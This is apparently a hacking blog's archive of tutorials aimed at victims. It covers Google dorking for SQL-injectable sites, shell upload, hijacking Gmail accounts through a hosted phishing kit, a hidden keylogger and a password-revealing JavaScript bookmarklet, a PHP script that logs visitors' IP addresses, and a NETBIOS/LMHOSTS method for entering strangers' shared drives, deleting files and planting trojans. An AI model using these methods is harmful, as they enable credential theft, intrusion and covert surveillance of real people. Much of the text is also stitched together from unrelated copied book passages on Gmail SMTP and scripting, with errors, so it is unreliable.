Showing posts with label Hack. Show all posts
Showing posts with label Hack. Show all posts

Saturday

// // Leave a Comment

How To Hack, Learn Hacking Step by Step [Videos Tut]

Shell Upload using Live http Header


shell upload using live http header from umer siddiqui on Vimeo.

----------------------------*-.-*---------------------------*-.-*--------

Hack Website using Arbitrary File





hack website using Arbitrary File Upload Vulnerability from umer siddiqui on Vimeo.


 ------------------------------*-.-*-------------------------------------*-.-*----

HTML File Upload Vulnerability



html file upload vulnerablity from umer siddiqui on Vimeo.

  ------------------------------*-.-*-------------------------------------*-.-*-----

Manual SQLi



sqli manual from umer siddiqui on Vimeo.

------------------------------*-.-*-------------------------------------*-.-*----

Shell Upload Vulnerability



Shell Upload Vulnerablity from umer siddiqui on Vimeo.

 ------------------------------*-.-*-------------------------------------*-.-*-------

How to Hack Website Using Sql Map

. . .
How to Hack Website Using Sql Map By Umer Siddiqui from umer siddiqui on Vimeo.
Read More

Wednesday

// // Leave a Comment

How to Find SQLi Vulnerable Website [Beginners Guide]

We all know that for attack we need a vulnerable website, today we do it from Sql injection. This is most time-consuming process. Since a SQL Injection attack works directly with databases, you should have a basic understanding of SQL before getting started.  SQL Database for Beginners is an excellent resource for those unfamiliar with Structured Query Language.  In this Tut you will learn how to find Vulnerable sites.


  • 1st one is to get a target website or a hosted site like : www.southbayballet.org

http://www.cometohack.com/2013/03/learn-hacking-step-by-step-how-to.html

Now goto
Open that link just type your site link & click on Check.

On YouGetSignal.com you can check that how many websites are hosted on that server which one you've a site, now you may check this in screen shot.


http://www.cometohack.com/2014/02/how-to-hack-someones-ip-address-2014.html

Now going to find a Vulnerable site thorough IP which is showing host server IP there.

http://www.cometohack.com/2014/01/dangerous-computer-virus-ever.html

There are 11 Domain Hosted on the same server & IP is  | 192.186.235.105 | 

Now goto Bing.com & type there
ip:192.186.235.105 php?id=
You must have to change that IP into your showing IP, so type in bing & search there as well as i do :)





http://www.cometohack.com/2014/02/how-to-remvoe-shortcut-folder-virus.html


Now open a link in new tab & after opening that link just type there   '    & press Enter , now you may found Msql Error there.

After that bing will search the sites which have extension php?id= like this www.site.com/index.php?id= and it will give u a list of sites which ends with this extension php?id= like in image given below.

http://www.cometohack.com/


And now we have found a SQLi Vulnerable Website easily, Enjoy & Happy Hacking

  • Note: This is Only Educational Purpose

If found any site vulnerable to sql then Hack it using SQL Exploiter tools.


Method Second will be explained in next post.

Just comment if any problem and share my post.








Read More

Thursday

// // Leave a Comment

How to Hack Gmail Password or Account




It is possible and it is easy. This way of hacking into email. I have tried the method.  Looking for alternate ways to Hack Gmail account, why not give a try to Fake Gmail Hacker tool, read how to use Gmail Hacker tool to Hack Gmail accounts The easiest and smartest way of hacking someone's Gmail account is by using smart phishing techniques


Sending Mail

You know how to read the mail in your Inbox with your own programs, it’s time to move on to replying to those mails by sending your own messages.

Sending Mail with Gmail SMTP

The first thing to remember is that Gmail provides its own SMTP server. This offers two major features. First, you can use the SMTP server from your own e-mail application, which is a great help if you’re traveling and your usual e-mail provider is unreachable. The second use is that every single scripting language you might have a desire to use has standard SMTP support available as a library, and the support for TLS encryption, which you need to connect to Gmail, is being added apace. First, though, the settings you’ll need:

  •  Server name:smtp.google.com
  •  Username: yourgmailname@gmail.com
  •  Password:Your Gmail password
  •  Security:Yes, using TLS

One thing to note about this technique is that Gmail will rewrite your e-mail headers. It replaces the From: and Reply-to: lines with your Gmail address because Gmail also automatically adds the so-called Domain Keys to their outgoing e-mails, allowing spam-hit system administrators to block fake Gmail mail fromtheir servers. Without the Domain Keys this wouldn’t work, but Gmail can’t send mail with a different From: or Reply-to: addresswithout breaking the Domain Key.

Using the SMTP Server Programmatically If you want to talk directly to the SMTP server instead of using the APIs featured in the rest of this chapter, then you will need to use a library that can deal with TLS encryption. There is no standard module to do this within Perl or PHP at the time of this writing, but Python users can use the standard smtplib, which comes with the Python distribution.

 Sending Mail with Perl

The Mail::Webmail::Gmail module encapsulates mail sending in one single function, send_message. The basic method to send a message is:
$gmail->send_message(
to => ‘user@domain.com’,
subject => ‘Test Message’,
msgbody => ‘This is a test.’
);
To send to multiple addresses, you can use an arrayref containing all of the
addresses:
my $email_addrs = [
‘user1@domain.com’,
‘user2@domain.com’,
‘user3@domain.com’, ];
$gmail->send_message(
to => $email_addrs,
subject => ‘Test Message’,
msgbody => ‘This is a test.’
);
You may also send mail using cc: and bcc:
$gmail->send_message(
to => $email_addrs,
cc=> $cc_email_addrs,
subject => ‘Test Message’,
msgbody => ‘This is a test.’
);
Listing 10-1 shows a small script, using the Mail::Webmail::Gmail module and
the Utils.pm code introduced in Chapter 7. It takes input from the keyboard,
and sends the mail directly. It’s exceptionally easy to understand, so no walkthrough
is necessary.


use Utils;
$gmail = login();
# input data from keyboard
print “to:\n”;
$to = <>;
print “subject:\n”;
$subject = <>;
print “body:\n”;
$body = <>;
$gmail->send_message( to => $to, subject => $subject, msgbody
=> $body ); # and send the message print “message sent\n”;



That script is, as you can see, remarkably simple. But it does provide the basis for any number of more complicated scripts. Being able to send mail from a script isn’t a new thing—it’s pretty easy to do without Gmail—but doing it via Gmail does give you some advantages. First, it’s easier, but second, the mail is automatically archived. Using Gmail to handle outgoing mail from your applications can therefore be more resilient, certainly easier, and much more useful than doing it any other way. In Chapter 9, you looked at downloading and reading new mail. Listing 10-2 shows a script that combines the techniques you learned there with your newfound skills at sending mail.


Method 1 of 4: Using Chrome to Hack Gmail

Hacking a Gmail address can come in handy if you lose your account password, manage other people’s business accounts or simply want to improve your computer skills. If you want to crack Gmail passwords, you can hack Gmail with browser settings, phishing and keylogging software and special scripts. Learning these common hacks can help you protect your computer from hackers.

  1. Find out if the person whose email you want to hack uses Google Chrome. If it is your own Gmail account, you can crack your own password using this method.
    • In order to use this method, the user must have set up Google Chrome to automatically log in to a Gmail account. You will access saved data in the Chrome browser.
  2. Open Google Chrome.
  3. Type in “chrome://settings/" into the URL address bar. Choose “Show Advanced Settings.”
  4. Choose “Manage Saved Passwords” link under the “Passwords and Forms” section. Chrome will load the accounts on which you use saved passwords.
  5. Click on the “Show” button next to the blocked out password to see the password. Chrome will automatically put bullets in place of the letters or numbers until you ask to show the password.

Method 2 of 4: Using Phishing to Hack Gmail

  1. Find a computer which is not your primary computer. Downloading third-party software is risky, and it may corrupt your computer with malware.
    • Use an old computer that is not used for work.
    • You may also choose to use the Internet from a free Wi-Fi connection so that you are hacking Gmail from a different IP address.
  2. Identify the Google email addresses you want to hack. 
  3. Download the Gmail Phishing program. Go to Gmail Phishing.
  4. Extract the rar file 3 from the program. You will extract 3 files: gmail.html, log.txt and mail.php. 
  5. Sign up for a free web hosting program, using a fake email account. Try a free web hosting program like drivehq.com or freewebhosting.net.
  6. Upload the gmail, log and mail files to your web hosting account.
  7. Create an HTML email that mimics the messages sent to Gmail users. It should redirect them to a fake website where you can gather data. There are several options:
    • You can find a Google email message that alerts the address owner to security breaches.
    • You can make the HTML email mimic the login page so the user attempts to login from the email.
    • You can create another fictional email that invites the user to click on the email in order to log in.
    • Keep in mind that phishing scams that use these methods are illegal and can result in fines and jail time.
  8. Include the 3 hosted files in your email and/or web page that mimics Gmail. They will gather data when the user clicks on the link to sign into Gmail.
  9. Wait for the user to click on the link and sign in using your website.
  10. Refresh your hosted files. Open the log.txt file. It should include the username and password for the email account. 


Method 3 of 4: Using Password Reminder Script

  1. Go onto the computer of the person whose Gmail account you want to hack.
  2. Be reasonably sure that the person uses saved passwords and reminders to manage passwords.
    • For instance, if the person is a computer technician or hacker, it is unlikely they will fall for the same tricks they use. If the person is a beginning or intermediate computer user, it is likely this process will work.
  3. Go to the Gmail login page. Wait for the program to load their email address. Google will often automatically load the email address, but not the password.
  4. Type the following script into the address bar (if copy and pasting from this page, remove the line breaks in a text editor first):
    • “javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
      %20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)%20
      {%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)%20s%20+
      =%20f[i].value%20+%20%22n%22;%20}%20}%20if%20(s)%20alert(%22P
      asswords%20in%20forms%20on%20this%20page:nn%22%20+%20s);
      %20else%20alert(%22There%20are%20no%20passwords%20in%20forms%
    • 20on%20this%20page.%22);})();.”
  5. Press “Enter. Wait for the password to flash on the screen in a dialog box. 

Method 4 of 4: Using Keylogging Software

  1. Log into the person’s computer whose email you would like to hack. You will need a half an hour or more of access with this method.
  2. Download a software program, which will capture every keystroke typed on the computer. A keylogging program will remember passwords and any other typed data.
    • There are many of these keylogging programs available on the Internet. Spectorsoft.com is a recommended keylogging software program and sells for about $100.
    • If properly downloaded it should operate undetected by the owner of the computer.
  3. Set up the keylogging software so that it emails you when the computer has used Gmail. It is a good idea to use a newly created and anonymous email account.
  4. Access the resulting stored logs once you receive the email. The username and password can be discovered in these logs. 

Warnings

  • Disclaimer: The information provided in this article is for educational purposes only. WikiHow is in no way responsible for any kind of damage resulting from the information given in this article. The sole purpose of this article is to impart knowledge and make people aware of security concerns.
  • Beware that many of the software programs claiming to hack Gmail accounts are scams.







Getting Inside Gmail
What has happened here? Well, the link in the code doesn’t go anywhere, but clicking it sets the JavaScript going. Have a look at the first half of the code again:

<script type=”text/javascript”>
var xmlhttp=false;
try {
xmlhttp = new ActiveXObject(“Msxml2.XMLHTTP”);
} catch (e) {
try {
xmlhttp = new ActiveXObject(“Microsoft.XMLHTTP”);
} catch (E) {
xmlhttp = false;
}
}
if (!xmlhttp && typeof XMLHttpRequest!=’undefined’) {
xmlhttp = new XMLHttpRequest();
}
Stepping through this from the beginning, you set up a variable called
xmlhttp
and set it to false. You use this variable to help check which browser you’re using.
The
XMLHttpRequest
object is called different things in different applications
(Technically speaking, it’s not a standard part of the JavaScript specification, so
different people call it different things. Ho hum.). In Microsoft browsers, it’s an
Active X object called
Msxml2.XMLHTTP
or
Microsoft.XMLHTTP
, whereas in
Mozilla, Safari, and others, it’s a standard JavaScript function called
XMLHttpRequest
.
So the first half of the code goes through the alternatives, trying to define
xml- http
as an  XMLHttp Request object by calling each of the possible functions in
turn. First it tries Msxml2.XMLHTTP
, then  Microsoft.XMLHTTP
, and finally defaults to  XMLHttpRequest
. (Usually, of course, there’s another test for no-JavaScript-support-at-all, but we’ll skip that here for the sake of brevity.)
Now, go line by line through the second half of the code:

function Listing1() {
xmlhttp.open(“GET”, “Listing.txt”,true);
xmlhttp.onreadystatechange=function() {
if (xmlhttp.readyState==4) {
alert(xmlhttp.responseText)
}
}
xmlhttp.send()
}

 The easiest and smartest way of hacking someone's Gmail account is by using smart phishing techniques. Start by downloading the Gmail phisher then extract the three rar files. Upload all the three files to a free web hosting server and send them to your victim. After sending the details wait for the user to log in then his or her ID and passwords are yours. 

Gmail is one of the most widely used email services across the world and it’s no wonder why many people want to hack gmail. So if you are curious to know how to hack a gamil account then this article is for you.
Here in this article, I will show you some of the real and working ways to hack gmail and will also make you aware of the common scams and myths associated with hacking gmail.
 
Before I discuss how to hack gmail, I want to make our readers aware of the common scams and myths associated with hacking gmail or any other email. So here we go
 
I. There is no ready made software/program that will hack gmail just with a click of a button. So never get fooled by something called gmail hacking software. If there exists such program to hack gmail then it’s no more than a scam.
 
II. Most of the email hacking services on the internet claim to hack gmail password for just a small fee. many of the services have been tested by our team and found that most of them are scams. So we make aware you that don't be fooled by such services if any one offers.
 
At this point you may be wondering what are the other ways to hack gmail then. So here are the working ways to hack gmail.
With my experience in the field of hacking and security I can tell you that there are three ways to hack gmail account.
1. Keylogging
2. Phishing
Any other method to hack gmail other than these two are simply scam or don't work.

Easiest Way to Hack Gmail

The easiest way to hack gmail is through keylogging. It is done using a small program/software called keylogger. This keylogger when installed on any computer will capture each and every keystroke including passwords. Also it works in complete stealth mode by completely hiding itself. So installing a keylogger on the computer is the easiest way to hack gmail. Once the victim logs into his gmail account from this computer his gmail username & password are captured and stored instantly. The stored logs are sent to you via email. But what if you do not have physical access to the computer? Well, still you need not worry. there are some keylogger you can install remotely also.
For more details on how keylogger is used read book HACKING MADE EASY

Other ways to Hack Gmail   

The other most commonly used trick to hack Gmail is using a Fake Login Page (which is called as Phishing). Today, Fake login pages are the most widely used techniques to hack Gmail. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.
 
However creating a fake login page and taking it online to successfully hack a Gmail password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Gmail since it’s the easiest way.


Read More

Sunday

// // 2 comments

How to Hack Someones IP Address 2015



An ultimate hack which enable u to trace any one any where in the world


Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. Finding out someone's IP address is like finding their phone number, an IP address can be used to find the general location where that person lives. Now while most of the tutorials on the net teach you how to steal an ip address via MSN, or any other chat software, in this post I’ll show you how to find IP address of someones computer using script. Using this method for hacking someones ip adress is very easy and effectively, so just follow the steps bellow.

NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk.

http://www.cometohack.com/2013/03/learn-hacking-step-by-step-how-to.html

How to Hack Someones IP Address?


Alright, I'm gonna give you this script, that you write in the index.php. It will redirect them tohttp://www.google.com/, but you can change that in the script.


Here is the sript:

Code:



$file = 'IPz.txt';
$handle = fopen($file,'a');
if(!isset($_GET['p'])) { header('Location: http://google.com'); }
fwrite($handle, $_GET['p'].': '.$_SERVER['REMOTE_ADDR'].'\r\n');
fclose($handle)
?>

1. First of all you need to make a new .txt document on the website you're uploading this to. Call it IPz.txt (You can change that in the script aswell where it says $file = 'IPz.txt'; in the second line. Then change the CHMOD to 777.

2. Now you need to past the script above in to a .php document, and upload it.


3. Now you make people visit your site, and they will get redirected to Google.

4. To view the IP, you simply add "/IPz.txt" after your domain, and you'll see the IP.



This is a very simple, but effectually method for stealing someones IP Address.

Hope you'll find this tutorial useful. Happy Hacking :)

http://www.cometohack.com/2014/02/learn-c-and-c-programming-language.html

Introduction
1. Welcome to the basic NETBIOS document created by aCId_rAIn. This document
will teach you some simple things about NETBIOS, what it does, how to use it, how to
hack with it, and some other simple DOS commands that will be useful to you in the
future.
1. Hardware and Firmware
1a. The BIOS
The BIOS, short for Basic Input/Output Services, is the control program of the PC.
It is responsible for starting up your computer, transferring control of the system to
your operating system, and for handling other low-level functions, such as disk access.
NOTE that the BIOS is not a software program, insofar as it is not purged from
memory when you turn off the computer. It's
firmware, which is basically software on a chip.
A convenient little feature that most BIOS manufacturers include is a startup
password. This prevents access to the system until you enter the correct password.
If you can get access to the system after the password has been entered, then there
are numerous software-based BIOS password extractors available from your local
H/P/A/V site.
NETBIOS/NBTSTAT - What does it do?
2. NETBIOS, also known as NBTSTAT is a program run on the Windows system and is
used for identifying a remote network or computer for file sharing enabled. We can
expoit systems using this method. It may be old but on home pc's sometimes it still
works great. You can use it on your friend at home or something. I don't care what
you do, but remember, that you are reading this document because you want to learn.
So I am going to teach you. Ok. So, you ask, "How do i get to NBTSTAT?" Well, there
are two ways, but one's faster.
Method 1:Start>Programs>MSDOS PROMPT>Type NBTSTAT
Method 2:Start>Run>Type Command>Type NBTSTAT
(Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.)
Ok! Now since you're in the DOS command under NBTSTAT, you're probably
wondering what all that crap is that's on your screen. These are the commands you
may use. Your screen should look like the following:
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer
NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts
Refresh
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds between each display.
Press Ctrl+C to stop redisplaying
statistics.
C:\WINDOWS\DESKTOP>
The only two commands that are going to be used and here they are:
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
                                                  Host Names
3. Now, the -a means that you will type in the HOST NAME of the person's computer
that you are trying to access. Just in case you don't have any idea what a Host Name
looks like here's an example.
123-fgh-ppp.internet.com
there are many variations of these adresses. For each different address you see
there is a new ISP assigned to that computer. look at the difference.
abc-123.internet.com
ghj-789.newnet.com
these are differnet host names as you can see, and, by identifying the last couple
words you will be able to tell that these are two computers on two different ISPs.
Now, here are two host names on the same ISP but a different located server.
123-fgh-ppp.internet.com
567-cde-ppp.internet.com                                                    IP Addresses
 


4. You can resolce these host names if you want to the IP address (Internet Protocol)
IP addresses range in different numbers. An IP looks like this:
201.123.101.123
Most times you can tell if a computer is running on a cable connection because of the
IP address's numbers. On faster connections, usually the first two numbers are low.
here's a cable connection IP.
24.18.18.10
on dialup connections IP's are higher, like this:
208.148.255.255
notice the 208 is higher than the 24 which is the cable connection.
REMEMBER THOUGH, NOT ALL IP ADDRESSES WILL BE LIKE THIS.
Some companies make IP addresses like this to fool the hacker into believing it's a
dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway This
gives you an idea on IP addresses which you will be using on the nbtstat command.
                           Getting The IP Through DC (Direct Connection)
5. First. You're going to need to find his IP or host name. Either will work. If you are
on mIRC You can get it by typing /whois (nick) ...where (nick) is the persons nickname
without parenthesis. you will either get a host name or an IP. copy it down. If you do
not get it or you are not using mIRC then you must direct connect to their computer
or you may use a sniffer to figure out his IP or host name. It's actually better to do
it without the sniffer because most sniffers do not work now-a-days. So you want to
establish a direct connection to their computer. OK, what is a direct connection?
When you are:
Sending a file to their computer you are directly connected.
AOL INSTANT MESSENGER allows a Direct Connection to the user if accepted.
ICQ when sending a file or a chat request acception allows a direct connection.
Any time you are sending a file. You are directly connected. (Assuming you know the
user is not using a proxy server.)
Voice Chatting on Yahoo establishes a direct connection.
If you have none of these programs, either i suggest you get one, get a sniffer, or
read this next statement.
If you have any way of sending thema link to your site that enables site traffic
statistics, and you can log in, send a link to your site, then check the stats and get
the IP of the last visitor. It's a simple and easy method i use. It even fool some
smarter hackers, because it catches them off guard. Anyway, once you are directly
connected use either of the two methods i showed you earlier and get into DOS. Type
NETSTAT -n. NETSTAT is a program that's name is short for NET STATISTICS. It
will show you all computers connected to yours. (This is also helpful if you think you
are being hacked by a trojan horse and is on a port that you know such as Sub Seven:
27374.) Your screen should look like this showing the connections to your computer:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 205.188.8.7:26778 ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
The first line indicated the Protocol (language) that is being used by the two
computers.
TCP (Transfer Control Protocol) is being used in this and is most widely used.
Local address shows your IP address, or the IP address of the system you on.
Foreign address shows the address of the computer connected to yours.
State tells you what kind of connection is being made ESTABLISHED - means it will
stay connected to you as long as you are on the program or as long as the computer is
allowing or is needing the other computers connection to it. CLOSE_WAIT means the
connection closes at times and waits until it is needed or you resume connection to be
made again. One that isn't on the list is TIME_WAIT which means it is timed. Most
Ads that run on AOL are using TIME_WAIT states.
the way you know the person is directly connected to your computer is because of
this:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 abc-123-ppp.webnet.com ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
Notice the host name is included in the fourth line instead of the IP address on all.
This is almost ALWAYS, the other computer that is connected to you. So here, now,
you have the host name:
abc-123-ppp.webnet.com
If the host name is not listed and the IP is then it NO PROBLEM because either one
works exactly the same. I am using abc-123-ppp.webnet.com host name as an example.
Ok so now you have the IP and/or host name of the remote system you want to
connect to. Time to hack!
Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. Ok, there's
the crap again. Well, now time to try out what you have leanred from this document
by testing it on the IP and/or host name of the remote system. Here's the only thing
you'll need to know.
IMPORTANT, READ NOW!!!
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
Remember this?
Time to use it.
-a will be the host name
-A will be the IP
How do i know this?
Read the Statements following the -a -A commands. It tells you there what each
command takes.
So have you found which one you have to use?
GOOD!

Time to start.
                                          Using it to your advantage
6. Type this if you have the host name only.
NBTSTAT -a (In here put in hostname without parenthesis)
Type this is you have the IP address only.
NBTSTAT -A (In here put in IP address without parenthesis)
Now, hit enter and wait. Now Either one of two things came up
1. Host not found
2. Something that looks like this:
--------------------------------------------
NetBIOS Local Name Table
Name Type Status
---------------------------------------------
GMVPS01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
GMVPS01 <03> UNIQUE Registered
GMVPS01 <20> UNIQUE Registered
WORKGROUP <1e> GROUP Registered
---------------------------------------------
If the computer responded "Host not found" Then either one of two things are the
case:
1. You screwed up the host name.
2. The host is not hackable.
If number one is the case you're in great luck. If two, This system isn't hackable
using the NBTSTAT command. So try another system.
If you got the table as above to come up, look at it carefully as i describe to you each
part and its purpose.
Name - states the share name of that certain part of the computer
<00>, <03>, <20>, <1e> - Are the Hexidecimal codes giving you the services available on 
that share name.
Type - Is self-explanatory. It's either turned on, or activated by you, or always on.
Status - Simply states that the share name is working and is activated.
Look above and look for the following line:
GMVPS01 <20> UNIQUE Registered
See it?
GOOD! Now this is important so listen up. The Hexidecimanl code of <20> means that 
file sharing is enabled on the share name that is on that line with the hex number. So
that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's
How to do it. (This is the hard part)
                                                  LMHOST File
7. There is a file in all Windows systems called LMHOST.sam. We need to simply add
the IP into the LMHOST file because LMHOST basically acts as a network,
automatically logging you on to it. So go to Start, Find, FIles or Folders. Type in
LMHOST and hit enter. when it comes up open it using a text program such as
wordpad, but make sure you do not leave the checkmark to "always open files with
this extension" on that. Simply go through the LMHOST file until you see the part:
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
## Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmans
erver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
Read this over and over until you understand the way you want your connection to be
set. Here's an example of how to add an IP the way I would do it:
#PRE #DOM:255.102.255.102 #INCLUDE
Pre will preload the connection as soon as you log on to the net. DOM is the domain or
IP address of the host you are connecting to. INCLUDE will automaticall set you to
that file path. In this case as soon as I log on to the net I will get access to
255.102.255.102 on the C:/ drive. The only problem with this is that by doin the
NETSTAT command while you are connected, and get the IP of your machine. That's
why it only works on simple PC machines. Because people in these days are computer
illiterate and have no idea of what these commands can do. They have no idea what
NETSTAT is, so you can use that to your advantage. Most PC systems are kind of
hard to hack using this method now because they are more secure and can tell when
another system is trying to gain access. Also, besure that you (somehow) know
whether they are running a firewall or not because it will block the connection to
their computer. Most home systems aren't running a firewall, and to make it better, they don't know how operate the firewall, therefore, leaving the hole in the system.
To help you out some, it would be a great idea to pick up on some programming
languages to show you how the computer reads information and learn some things on
TCP/IP (Transfer Control Protocol/Internet Protocol) If you want to find out
whether they are running a firewall, simply hop on a Proxy and do a port scan on their
IP. You will notice if they are running a firewall because most ports are closed. Either
way, you still have a better chance of hacking a home system than hacking Microsoft.
                                                       Gaining Access
7. Once you have added this to you LMHOST file. You are basically done. All you need
to do is go to:
Start
Find
Computer
Once you get there you simply type the IP address or the host name of the system.
When it comes up, simply double click it, and boom! There's a GUI for you so you
don't have to use DOS anymore. You can use DOS to do it, but it's more simple and
fun this way, so that's the only way i put it. When you open the system you can edit,
delete, rename, do anything to any file you wish. I would also delete the command file
in C:/ because they may use it if they think someone is in their computer. Or simply
delete the shortcut to it. Then here's when the programming comes in handy. Instead
of using the NBTSTAT method all the time, you can then program you own trojan on
your OWN port number and upload it to the system. Then you will have easier access
and you will also have a better GUI, with more features. DO NOT allow more than one
connection to the system unless they are on a faster connection. If you are
downloading something from their computer and they don't know it and their
connection is being slow, they may check their NETSTAT to see what is connected,
which will show your IP and make them suspicious. Thats it. All there is to it. Now go
out and scan a network or something and find a computer with port 21 or something
open.

Read More

Earn 25$ Instant